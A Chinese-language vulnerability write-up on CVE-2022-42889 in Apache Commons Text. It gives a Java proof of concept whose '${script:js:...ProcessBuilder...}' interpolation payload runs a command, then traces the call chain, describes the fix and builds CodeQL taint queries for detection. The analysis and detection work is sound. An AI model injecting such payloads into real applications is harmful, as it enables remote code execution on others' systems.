Apache Commons Text RCE漏洞(CVE-2022-42889)分析与CodeQL实践<\/h1>

0x01 漏洞概述<\/h2>
漏洞描述<\/strong>:
Apache Commons Text组件在执行变量插值(variable interpolation)时存在远程代码执行漏洞。该组件允许动态评估和扩展属性，标准格式为`${prefix:name}<\/code>，其中"prefix"用于查找执行插值的StringLookup<\/code>实例。在1.5到1.9版本中，默认的Lookup实例集包含可能导致任意代码执行或与远程服务器交互的插值器。<\/p>`
`影响版本<\/strong>: 1.5 <= Apache Commons Text <= 1.9<\/p>`

0x02 环境搭建<\/h2> 在Maven项目中添加依赖:<\/p> <dependency><\/span> <\/span><\/span> <groupId><\/span>org.apache.commons<\/groupId><\/span> <\/span><\/span> <artifactId><\/span>commons-text<\/artifactId><\/span> <\/span><\/span> <version><\/span>1.9<\/version><\/span> <\/span><\/span><\/dependency><\/span> <\/span><\/span><\/code><\/pre>0x03 漏洞复现<\/h2> 基本使用示例<\/h3> final<\/span> StringSubstitutor interpolator =<\/span> StringSubstitutor.<\/span>createInterpolator<\/span>();<\/span> <\/span><\/span>final<\/span> String text =<\/span> interpolator.<\/span>replace<\/span>(<\/span> <\/span><\/span> "Base64 Decoder: ${base64Decoder:SGVsbG9Xb3JsZCE=}\n"<\/span> +<\/span> <\/span><\/span> "Base64 Encoder: ${base64Encoder:HelloWorld!}\n"<\/span> +<\/span> <\/span><\/span> \/\/ 其他插值示例... <\/span><\/span><\/span><\/span>);<\/span> <\/span><\/span><\/code><\/pre>漏洞利用PoC<\/h3> import<\/span> org.apache.commons.text.StringSubstitutor;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> EXP<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> {<\/span> <\/span><\/span> StringSubstitutor interpolator =<\/span> StringSubstitutor.<\/span>createInterpolator<\/span>();<\/span> <\/span><\/span> String payload =<\/span> "${script:js:new java.lang.ProcessBuilder(\"calc\").start()}"<\/span>;<\/span> <\/span><\/span> interpolator.<\/span>replace<\/span>(<\/span>payload);<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>0x04 漏洞分析<\/h2> 关键调用链<\/h3> StringSubstitutor.createInterpolator()<\/code>创建字符串替换器<\/li> replace()<\/code>方法调用substitute()<\/code>方法<\/li> 最终调用到org.apache.commons.text.StringSubstitutor#substitute<\/code><\/li> 解析变量名后调用resolveVariable()<\/code><\/li> 最终到达org.apache.commons.text.lookup.ScriptStringLookup#lookup<\/code><\/li> <\/ol> 关键点<\/h3> 处理payload时对:<\/code>前后内容进行Split操作<\/li> JavaScript引擎被实例化并执行恶意代码<\/li> 通过scriptEngine.eval()<\/code>执行任意JavaScript代码<\/li> <\/ul> 0x05 漏洞修复<\/h2> 在1.11.0版本中移除了不安全的插值器：<\/p> script<\/code><\/li> dns<\/code><\/li> url<\/code><\/li> <\/ul> 0x06 CodeQL实践<\/h2> 数据库构建注意事项<\/h3> 错误方式:<\/p> codeql database create DB_DIR --language=<\/span>java --command=<\/span>'mvn clean install'<\/span> <\/span><\/span><\/code><\/pre>正确方式:<\/p> 提取所有相关包(包括JDK和漏洞包)<\/li> 反编译这些包<\/li> 使用extract-java<\/code>构造CodeQL数据库<\/li> <\/ol> CodeQL查询<\/h3> Sink点定义<\/h4> class ScriptEngineEval extends DataFlow::Node { ScriptEngineEval() { exists(MethodAccess ma | ma.getCallee().hasName("eval") and ma.getCallee().getDeclaringType().getASupertype*() .hasQualifiedName("javax.script", "ScriptEngine") and this.asExpr() = ma.getArgument(0) ) } } <\/code><\/pre> Source点定义<\/h4> class PublicMethodParameter extends DataFlow::Node { PublicMethodParameter() { exists(Method m, Parameter p | m.getDeclaringType().isPublic() and m.isPublic() and p = m.getAParameter() and p.getType().hasName("String") and this.asParameter() = p ) } } <\/code><\/pre> 完整查询<\/h4> \/** * @kind path-problem *\/ import java import semmle.code.java.dataflow.DataFlow import DataFlow::PathGraph import semmle.code.java.dataflow.TaintTracking class Config extends TaintTracking::Configuration { Config() { this = "config" } override predicate isSource(DataFlow::Node source) { source instanceof PublicMethodParameter } override predicate isSink(DataFlow::Node sink) { sink instanceof ScriptEngineEval } } from Config cfg, DataFlow::PathNode source, DataFlow::PathNode sink where cfg.hasFlowPath(source, sink) select sink, source, sink, "path" <\/code><\/pre> 0x07 总结<\/h2> 该漏洞源于Apache Commons Text组件中不安全的插值器实现<\/li> 通过script:<\/code>前缀可以执行任意JavaScript代码<\/li> 使用CodeQL可以有效识别此类漏洞，但需要注意数据库构建方式<\/li> 修复方案是移除危险的插值器前缀<\/li> <\/ol> 参考链接<\/h2> https:\/\/l3yx.github.io\/2022\/12\/17\/用CodeQL分析漏洞-CVE-2022-42889\/<\/li> <\/ul>